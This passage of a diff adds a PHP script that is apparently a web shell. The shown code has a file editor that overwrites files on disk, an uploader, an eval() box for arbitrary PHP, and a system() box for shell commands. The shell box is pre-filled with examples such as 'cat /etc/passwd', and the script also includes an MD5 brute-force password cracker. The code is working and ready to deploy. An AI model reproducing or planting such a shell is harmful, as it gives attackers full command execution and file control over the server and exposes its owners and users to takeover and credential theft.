+   <input type=hidden name=c value=e_submit>
+   <input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+   <input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+   <textarea name=text cols=70 rows=20 style='width: 100%;'>".
+   htmlspecialchars(fread($fi,filesize($d.$f)))."</textarea><p>
+   <input type=submit value=' ".mm("SAVE FILE (write to disk)")." '>
+   <input type=checkbox name=confirm value=1 id=conf> 
+   <label for=conf><font color=red><b><= confirm</b></font></label>
+   </form>";
+
+   break;
+
+
+case "e_submit":
+
+   if (!$write_access) exitw();
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("file not found");
+   if (!isset($text)) exit("err# e_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($d.$f,"w+")) exit("access denied");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+   echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">SAVE DONE (go back)!</a>";
+
+   break;
+
+
+
+case "newfile_submit":
+
+   if (!$write_access) exitw();
+
+   if (!isset($text) || !isset($df)) exit("err# newfile_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($df,"w+")) exit("access denied, can't create/open [$df]");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+   break;
+
+
+case "fileupload_submit":
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newfile_submit 1");
+   if (!isset($df3)) exit("err# newfile_submit 2");
+
+   $fname="";
+   if (isset($df2)) { 
+      if (!preg_match("~([^/]+)$~",$HTTP_POST_FILES['userfile']['name'],$ok)) {
+         exit("Upload failed: can't detect file name");
+      }
+      $fname=$ok[1];
+   }
+   else {
+      $fname=$df3;
+   }
+   if ($fname=="") 
+     exit("".mm("You mast checked 'create file name automatic' OR typed file name!").""); 
+   if (isset($df4)) $fname=strtolower($fname);
+
+   echo "Temp file: ".$HTTP_POST_FILES['userfile']['tmp_name']."<br>";
+   echo "Origin file name: ".$HTTP_POST_FILES['userfile']['name']."<br>";
+   echo "File size: ".$HTTP_POST_FILES['userfile']['size']."<br>";
+   if ($df[strlen($df)-1]!="/") $df.="/";
+   echo "".mm("SAVING TO").": <font color=blue>$df</font><font color=red><b>$fname</b></font><p>";
+
+   ob();
+   $ok=copy($HTTP_POST_FILES['userfile']['tmp_name'],"$df$fname");
+   obb();
+   if (!$ok) exit("<font color=red><b>".mm("Sorry, access denied")."</b></font> $obb");
+
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>NEW FILE SAVED</a>";
+  
+   break;
+
+
+case "newdir_submit": 
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newdir_submit 1");
+   ob();
+   if (!mkdir($df,$mkdir_mode)) {
+      obb();
+      exit("Access denied $obb");
+   }
+   obb();
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>Go to new directory!</a>";
+
+   break;
+
+
+case "t": 
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+
+   if (!$write_access) exitw();
+   error_reporting(2038);
+
+   if (!isset($php)) {
+      $php="/* line 1 */\n\n// ".mm("for example, uncomment next line").":\nphpinfo();\n\n//readfile(\"/etc/passwd\");\n\n/* line 8 */";
+      $skipphp=1;
+      $pre='checked';
+      $nlbr='';
+      $xmp='';
+      $htmls='checked';
+   } 
+
+   echo "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"&lt;?\" ".mm("and")." \"?&gt;\")
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=php rows=".(!isset($skipphp)?10:4)." cols=60 style='width:100%;'>$php</textarea>
+<input type=checkbox name=pre value='checked' $pre id='pre'>
+   <label for='pre'> add &lt;pre&gt;</label> &nbsp;
+<input type=checkbox name=xmp value='checked' $xmp id='xmp'>
+   <label for='xmp'> add &lt;xmp&gt;</label> &nbsp;
+<input type=checkbox name=htmls value='checked' $htmls id='htmls'>
+   <label for='htmls'> add htmlspecialchars()</label> &nbsp;
+<input type=checkbox name=nlbr value='checked' $nlbr id='nlbr'>
+   <label for='nlbr'> add nl2br()</label><br>
+<input type=submit></form>
+<P>";
+
+   if (!isset($shell)) $skipshell=1;
+
+   if (!isset($skipphp)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      if ($pre<>'') echo "<pre>";
+      if ($xmp<>'') echo "<xmp>";
+      if ($nlbr<>'' || $htmls<>'') {
+         ob_start();
+      }
+      if ($phpeval_access) eval($php);
+      else die("Sorry, function eval() disabled.");
+      if ($nlbr<>'' || $htmls<>'') {
+         $tmp=ob_get_contents();
+         ob_end_clean(); 
+         if ($htmls<>'') $tmp=htmlspecialchars($tmp);
+         if ($nlbr<>'') $tmp=nl2br($tmp);
+         echo $tmp;
+      }
+      if ($xmp<>'') echo "</xmp>";
+      if ($pre<>'') echo "</pre>";
+      echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      echo "</table></table></table></table></table></table></table></table></table></center></table><hr size=1 noshade>";
+   }
+
+   if (!isset($shell)) {
+      $shell="#".mm("example (remove comments '#')").": \n\n#cat /etc/passwd;\n\n#ps -ax\n\n#uname -a";
+      $skipshell=1;
+   }
+   echo "<P><b>".mm("Shell commands")."</b>
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=shell rows=".(!isset($skipshell)?10:4)." cols=60 style='width:100%;'>$shell</textarea><br>
+<input type=submit></form>
+<P>";
+   if (!isset($skipshell)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
+      if ($system_access) system($shell);
+      else die("Sorry, function system() disabled.");
+      echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
+      </table></table></table></table></table></table></table></table></table></center><hr size=1 noshade>";
+   }
+
+
+  $ttype=array(1=>"MD5",7=>"Decode MD5 (password crack)<br>",
+  2=>"Base64",3=>"Base64 + chunk",4=>"Base64 + chunk + quotes",
+  5=>"Decode Base64<br>",
+  6=>"UnixTime=>Date(".time().")",
+  8=>"MKtime: YYYY MM DD [hh [mm [ss]]]<br>",
+  9=>"Translit=&gt;RusText", 14=>"RusText=&gt;Translit<br>",
+  10=>"cp1251=&gt;koi8r",11=>"koi8r=&gt;cp1251",12=>"cp1251=&gt;mac",13=>"mac=&gt;cp1251",
+  15=>"koi8r=&gt;mac",16=>"mac=&gt;koi8r",
+  );
+  echo "<P><b>".mm("Universal convert")."</b>";
+
+  echo "<a name=convert></a><form action='$self#convert' method=post>";
+  foreach ($ttype as $k=>$v) 
+     echo "&nbsp;&nbsp;<nobr><input ".($k==$name?"checked":"")." type=radio name=name value=$k id=x$k><label for=x$k>$v</label></nobr> ";
+
+  echo "
+<input type=hidden name=c value=t>
+<textarea name=convert rows=".(isset($convert)?10:3)." cols=60 style='width:100%;'>".htmlspecialchars($convert)."</textarea><br>
+<input type=submit><br>";
+
+   
+   $russtr1="JCUKENGZH_FYVAPROLDESMIT_Bjcukengzh_fyvaproldesmit_b";
+   $russtr2="����������������������������������������������������";
+   function from_translit($ss) {
+      global $russtr1,$russtr2;
+      $w=array("Sch",'�',"SCH",'�',"ScH",'�',"SCh",'�',"sch",'�',"Jo",'�',"JO",'�',"jo",'�',
+      "Zh",'�',"ZH",'�',"zh",'�',"Ch",'�',"CH",'�',"ch",'�',"Sh",'�',"SH",'�',"sh",'�',
+      "##",'�',"''",'�',"Eh",'�',"EH",'�',"eh",'�',"Ju",'�',"JU",'�',"ju",'�',"Yu",'�',
+      "YU",'�',"yu",'�',"YA","�","Ya","�","ya","�","Ja",'�',"JA",'�',"ja",'�');
+      $c=count($w);
+      for ($i=0; $i<$c; $i+=2) $ss=str_replace($w[$i],$w[$i+1],$ss);
+      $ss=strtr($ss,$russtr1,$russtr2);
+      $ss=preg_replace("!([�-�]+)~([�-�]+)!is","\\1\\2",$ss);
+      return $ss;
+   }
+   function to_translit($ss) {
+      global $russtr1,$russtr2;
+      $ss=strtr($ss,$russtr2,$russtr1);
+      $ss=str_replace(
+         array('�', '�',  '�', '�', '�', '�', '�', '�', '�',  '�', '�', '�', '�', '�', ),
+         array('SH','SCH','ZH','YA','CH','YU','YO','sh','sch','zh','ya','ch','yu','yo',),
+         $ss);
+      return $ss;
+   }
+   
+   if (isset($convert)) {
+      if (!isset($name)) $name="0";
+      $out="";
+      switch ($name) {
+
+         case 1: 
+            $out=md5($convert);
+            break;
+
+         case 2:
+            $out=base64_encode($convert);
+            break;
+
+         case 3:
+            $out=chunk_split(base64_encode($convert));
+            break;
+
+         case 4:
+            $out=base64_encode($convert);
+            $out=substr(preg_replace("!.{1,76}!","'\\0'.\n",$out),0,-2);
+            break;
+
+         case 5:
+            $out=base64_decode($convert);
+            break;
+
+         case 6:
+            $convert=intval($convert);
+            if ($convert==0) $convert=time();
+            $out="Unixtime=$convert\n---Day/Month/Year--\n".
+               date("d/m/Y H:i:s",$convert)."\n".
+               date("d-m-Y H:i:s",$convert)."\n".
+               date("d.m.Y H:i:s",$convert)."\n".
+             "---Month/Day/Year--\n".
+               date("m/d/Y H:i:s",$convert)."\n".
+               date("m-d-Y H:i:s",$convert)."\n".
+               date("m.d.Y H:i:s",$convert)."\n".
+             "---------SQL-------\n".
+               date("Y-m-d H:i:s",$convert)."\n".
+               date("Y m d H i s",$convert)."\n".
+               date("YmdHis",$convert);
+            break;
+
+         case 8:
+            $c=explode(" ",trim(preg_replace("! +!"," ",$convert)));
+            if (count($c)<3 || count($c)>6) $out="Bad value. Type: 2000 12 31 or 2000 12 31 12 59 59";
+            else {
+               if (empty($c[0])) $c[0]=1970;
+               if ($c[0]<50) $c[0]=2000+$c[0];
+               if ($c[0]>50 && $c[0]<100) $c[0]=1900+$c[0];
+               if (empty($c[1])) $c[1]=1;
+               if (empty($c[2])) $c[2]=1;
+               if (empty($c[3])) $c[3]=0;
+               if (empty($c[4])) $c[4]=0;
+               if (empty($c[5])) $c[5]=0;
+               $out="TIME: $c[0]-$c[1]-$c[2] $c[3]:$c[4]:$c[5]\nMKTIME: ".mktime($c[3],$c[4],$c[5],$c[1],$c[2],$c[0]);
+            }
+            break;
+
+         case 9:
+            $out=from_translit($convert);
+            break;
+
+         case 14:
+            $out=to_translit($convert);
+            break;
+
+         case 10: $out=convert_cyr_string($convert,'w','k'); break;
+         case 11: $out=convert_cyr_string($convert,'k','w'); break;
+         case 12: $out=convert_cyr_string($convert,'w','m'); break;
+         case 13: $out=convert_cyr_string($convert,'m','w'); break;
+         case 15: $out=convert_cyr_string($convert,'k','m'); break;
+         case 16: $out=convert_cyr_string($convert,'m','k'); break;
+
+         case 7:
+            echo "<script>top.location.href='$self?c=md5crack&text=$convert'</script>";
+            break;
+
+         case 0:
+            $out="Please select anythink function in list. Example: type 'test' and select 'md5'. Then click 'Submit'.";
+            break;
+
+         default: 
+            $out='Sorry, this function not work (try new versions)';
+      }
+      echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<pre><xmp>$out</xmp></pre>\n\n\n\n\n\n\n\n\n<hr size=1 noshade>";
+   }
+   
+   break;
+
+
+case "md5crack":
+
+   echo "<form action=$self name=main><input type=hidden name=c value=md5crack>
+   <h2>Decode MD5 (<a href=$self>home</a>|<a href=$self?c=t&name=1#convert>md5</a>)</h2><P>";
+
+   if (!isset($go)) {
+      if (!isset($fullqty)) $fullqty="";
+      if (!isset($fulltime)) $fulltime="";
+      if (!isset($php)) $php="";
+      if (!isset($from)) $from="";
+      echo "<b>STRING</b>: <input type=text name=text value='$text' size=40> (only 32 char: 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f)";
+      echo "<P><b>Range</b>: <input type=text name=php value=\"".htmlspecialchars($php)."\" size=90><br>";
+      $chars=array(
+      'a-z'=>"abcdefghijklmnopqrstuvwxyz",
+      'a-z,A-Z'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
+      'a-z,0-9'=>"abcdefghijklmnopqrstuvwxyz0123456789",
+      'a-z,A-Z,0-9'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
+      'a-z,A-Z,0-9,other'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~`!@#\$%^&*()_+-=[]{};:,<.>/\"'\\");
+      $i=0;
+      foreach ($chars as $k=>$v) {
+         echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\",$v))."\"</script>
+         <a href='' onclick=\"document.main.php.value=str$i;return false\">$k</a> &nbsp; ";
+         $i++;
+      }
+      echo "<P>
+      <b>Start from</b>: <input type=text size=70 name=from value='$from'><P>
+      <input type=hidden name=go value=1>
+      <input type=hidden name=fullqty value=$fullqty>
+      <input type=hidden name=fulltime value=$fulltime>
+      <input type=submit value='Start!'><form>";
+   }
+   else {
+
+      function mdgetword() {
+         global $php,$from,$word;
+         $word="";
+         for ($i=0; $i<count($from); $i++) $word.=$php[$from[$i]];
+      }
+
+      $fulltime=@intval($fulltime);
+      $fullqty=@intval($fullqty);
+
+      $text=strtolower($text);
+      if (!preg_match("!^[0-9a-f]{32}$!",$text)) exit("md5 bad format: must be 32 bytes, range 0-9,a,b,c,d,e,f");
+      if (!isset($php) || strlen($php)==0) $php="qwertyuiopasdfghjklzxcvbnm";
+      if (!isset($from) || !preg_match("!^([0-9]+):(([0-9]+,)*[0-9]+)$!",$from,$ok)) {
+         $pos=0;
+         $from=0;
+      }
+      else {
+         $pos=$ok[1];
+         $from=$ok[2];
+      }
+      $from=explode(",",$from);
+      if (!is_array($from) || !count($from) || count($from)==1 && $from[0]==0) { 
+         $from=array(0);
+         if (md5("")===$text) exit("** DONE **<br><br>md5('')=$text<br><br>(try empty string, 0 bytes!)");
+      }
+      $phplen=strlen($php);
+      mdgetword();
+      $poslen=strlen($word);
+      if ($pos<0 || $pos>=$poslen) $pos=0;
+
+      for ($i=0; $i<10; $i++) { echo "<!-- -->\r\n"; flush(); }
+
+      echo "<h3><a href='$self?c=md5crack".
+         "&from=".urlencode("$pos:".implode(",",$from)).
+         "&text=".urlencode($text).
+         "&php=".urlencode($php).
+         "&fulltime=$fulltime&fullqty=$fullqty".
+         "'>Save this link</a> - click for break and save current position</h3>";
+      flush();
+
+      echo "
+      MD5_HASH=$text<br>
+      CURRENT_WORD=$word<br>
+      CURRENT_DIGIT=$pos:".implode(",",$from)."<br>
+      RANGE=".htmlspecialchars($php)."<br>
+      ProcessTime=$fulltime sec (".(floor($fulltime/60/60))."h)<br>
+      Calculation(qty)={$fullqty}0000<p><font face=courier>";
+      flush();
+
+
+      $fullsum=pow($phplen,$poslen);
+      $time1=time();
+      $i=0;
+
+      while (1) {
+
+         $i++;
+         if ($i>50000) {
+            $time=time()-$time1;
+            if ($time>20) break;
+            $i=0;
+            $sum=0;
+            for ($j=1; $j<count($from); $j++) $sum+=$from[$j]*pow($phplen,$j);
+            printf("<nobr><b>%02.2f%%</b> ($word) %02dsec |</nobr> \r\n",
+               $sum*100/$fullsum,$time);
+            flush();
+            $fullqty+=5;
+         }
+
+         if (md5($word)===$text) 
+            exit("<P><font color=red size=+1><b>** DONE **<P><tt>[$word]=[$text]</tt></b></font>
+            <script> window.focus();  window.focus(); setTimeout(\"alert('Done!')\",100);</script>");
+         $from[$pos]++;
+         if ($from[$pos]==$phplen) {
+            $flag=1;
+            $from[$pos]=0;
+            $word[$pos]=$php[0];
+            for ($pos=$pos+1; $pos<$poslen; $pos++) {
+               if ($from[$pos]+1<$phplen) {
+                  $from[$pos]++;
+                  $word[$pos]=$php[$from[$pos]];
+                  $flag=0;
+                  $pos=0;
+                  break;
+               }
+               else {
+                  $from[$pos]=0;
+                  $word[$pos]=$php[0];
+               }
+            }
+            if ($flag) {
+               $from[]=0;
+               $poslen=count($from);
+               $word.=$php[0];
+               $pos=0;
+               $fullsum=pow($phplen,$poslen);
+            }
+         }
+         $word[$pos]=$php[$from[$pos]];
+      }
+
+      $fulltime+=time()-$time1;
+      if ($i>5000) $fullqty++;
+      $url="$self?c=md5crack".
+           "&from=".urlencode("$pos:".implode(",",$from)).
+           "&text=".urlencode($text).
+           "&php=".urlencode($php).
+           "&fulltime=$fulltime&fullqty=$fullqty&go=1";
+      echo "<script>location.href=\"$url\"</script><a href='$url'>click here</a>";
+
+   }
+
+   break;
+
+
+case "phpinfo":
+
+   phpinfo();
+   break;
+
+
+case "codes":
+
+   error_reporting(2039);
+   if (!isset($limit)) $limit=999;
+   if (!isset($fontsize)) $fontsize="300%";
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+   echo "<h3>".mm("Character map (symbol codes table)")."</h3>
+   <form action=$self method=get>
+   <input type=hidden name=c value=\"codes\">
+   <select name=fontname size=1>
+   <option value='Webdings'>====[ ".mm("Select font")." ]====";
+
+   foreach (array('Arial','Courier','Comic Sans MS','Fixedsys','Small fonts','Symbol',
+      'System','Tahoma','Terminal','Times New Roman','Verdana',
+      'Webdings','Wingdings','Wingdings 2','Wingdings 3') as $v)
+      echo "<option".($fontname==$v?" selected":"").">$v";
+   
+   echo "</select>
+   ".mm("or type other")." 
+   <input size=13 type=text name=fontname2 value=\"$fontname2\">.
+   ".mm("Font size").": <input size=6 type=text name=fontsize value=\"$fontsize\">.<br>
+   ".mm("Code limit").": 
+   <input type=radio name=limit value=255 id=a1 ".($limit==255?"checked":"")."><label for=a1>0-255</label>
+   <input type=radio name=limit value=999 id=a2 ".($limit==999?"checked":"")."><label for=a2>0-999 </label>
+   <input type=radio name=limit value=9999 id=a3 ".($limit==9999?"checked":"")."><label for=a3>0-9999</label>
+   <input type=submit value='".mm("Generate table")." !'></form><P>";
+
+   if (!isset($fontname)) break; 
+   if (!empty($fontname2)) $fontname=$fontname2;
+   echo "
+   <STYLE>
+   .codes { font: $fontsize $fontname; text-align: center; }
+   .z { font: 12pt Fixedsys; color: #cccccc; }
+   </STYLE>
+   <table class=codes border=0 cellspacing=0 cellpadding=1>";
+   ?>
+   <SCRIPT>
+   m=8;
+   n=1;
+   s=new String("");
+   s=s+"<tr><td class=z>&amp;#0000;</td><td>&nbsp;</td>";
+   for (i=1; i<=<?php echo $limit; ?>; i++) {
+      if (i<10) x="000"+i;
+      else if (i<100) x="00"+i;
+           else if (i<1000) x="0"+i;
+                else x=i;
+      if (n%m==0) s=s+"<tr>";
+      s=s+"<td class=z>&amp;#"+x+";</td>";
+      s=s+"<td>&#"+x+";</td>";
+      if (n%m+1==m) s=s+"</tr>";
+      if (s.length>500) {
+         document.write(s);
+         s=""
+      } 
+      n++;
+   }
+   document.write(s);
+   </SCRIPT>
+   <?php
+
+   echo "</table>";
+   break;
+
+
+
+case "img":
+
+   unset($img);
+$img=array(
+'dir'=>
+'R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'.
+'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=',
+'fon'=>
+'R0lGODlhQAYEALMAAAAAAP///6bK8A4obRs2eSlFhDZTkEVjnVRyqWKCtnCQwXyezIiq1pO24J3A'.
+'6P///yH5BAEAAA8ALAAAAABABgQAAAT/cMhJq704E7n78EQXjmRpnmcRqizRsgUcz3Rt37QR63zR'.
+'GzygcEgsGo8HYNKQbDKfh2Z0Sq1ar9goQsvdeg/eMGJMLpvPaHRivG4j3O14Yk6v2+/4u2K+7yf8'.
+'Cn2Bg4SFhoeGC4GKjAqNC4yQkpOUlZaTDJCZmwubngygoaKjpKUNDKepqKipDa6vsLGysg4Ntbe2'.
+'tg63u72+v8AOArvDxcLFAsnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx'.
+'8vPSGfb3GCAfHBP6IvwgRKBIscJFwREvXMRYkVCGQhw1dPiYSJHiDx8SLwLBeKSjkyUg/5VAGRnl'.
+'CUkmWVKCWfmF5UqXX8bAZJmmJpubbt6QWaNzTs+ccOTkwbPnj9GjfIwCKspUqSBEiRxJnbpI6qNG'.
+'Vh1d2sopUydNYEF18tp1bClTq06JUqvK1aq0rGbNwvUKl11deIP9Mkasr7Fkwo4do0e4sOHDiBMr'.
+'Xsy4sePHkCNLnkzZHL7LmC9s2LdZ34eAAkOjUGGCNAyEBhkqfDiDNcTXGS1O7IFx9sYhHDuKRCIy'.
+'pBSSUqgAV7kFS/GXMcHIXK6cDEybOm+e4emzp/Wgdd7E0T50aNNAdADxeTroT3moVQspWrT+0dRI'.
+'k7Ju/VrJK/2ynsyG+nr2LSlVrMCVlsIsA8pVCyx05bJLXrzoFQxff0WITGUUVmjhhRhmqOGGHHbo'.
+'4YcgepPZiP3wA9A+nJ0o0GchsDjQiwaRFiNCL7R2Wo2vRZRDRbJpdJsQueWm2xImfdTbbkYKNwUU'.
+'KjXp0pPMJScGTdBVeZ10V2J3XXdEJaWUHUWZ9yV4ZDqFHnrrZVWVe5VYNZ8l9pF1H3/87ddVf6Oo'.
+'JSCAcMHSp1wGKujKXQsGo8uDvgwTWGCKKjMYYCFGKumklFZq6aWYZqrppstEAAA7',
+'mode'=>
+'R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO'.
+'2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/'.
+'dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=',
+
+'refresh'=>
+'R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA'.
+'AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY'.
+'3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ'.
+'R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=',
+'search'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//'.
+'/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap'.
+'s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD'.
+'AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr'.
+'Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==',
+'setup'=>
+'R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC'.
+'QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA'.
+'ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB'.
+'qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE'.
+'OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==',
+'up'=>
+'R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg'.
+'+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV'.
+'IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==',
+'sort_asc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa'.
+'SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==',
+'sort_desc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb'.
+'SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=',
+'exe'=>
+'R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7'.
+'WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt'.
+'xhIAOw==',
+'html'=>
+'R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz'.
+'c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P'.
+'KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk'.
+'Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR'.
+'ADs=',
+'txt'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ'.
+'SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7'.
+'UpPWG3Ig6Hq/XmRjuZwkAAA7',
+'unk'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANE'.
+'SLPcSzCqQKsVQ8JhexBBJnGVYFZACowleJZrRH7lFW8eDbMXaPO1juA2uXiGwBwFKRMeiTPlByrd'.
+'yUzYbJao6npVkQQAOw==',
+'php'=>
+'R0lGODlhEwAQALMAAAAAAP///9fX3d3f7s/S5F1qpmJpjKOqyr7D27i80K+ywEtam4OIk+T/AO7u'.
+'7v///yH5BAEAAA8ALAAAAAATABAAAAR08D0wK71VSna47yBHadxhnujRqKRJvC+SJIPKbgJR7DzP'.
+'NECNgNFbGI/HhmZQWASezugzsFBKdtJsoEA1aLBTJzTMIDWpRqr6mFgyounswiAgDYjY/FwxGD1K'.
+'BAMIg4MJCg41fiUpjAeKjY1+EwCUlZaVGhEAOw==',
+'img'=>
+'R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV'.
+'Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp'.
+'qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq'.
+'BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==',
+'edit'=>
+'R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze'.
+'EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61'.
+'LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==',
+'papki'=>
+'R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo'.
+'eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD'.
+'Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==',
+'home'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA'.
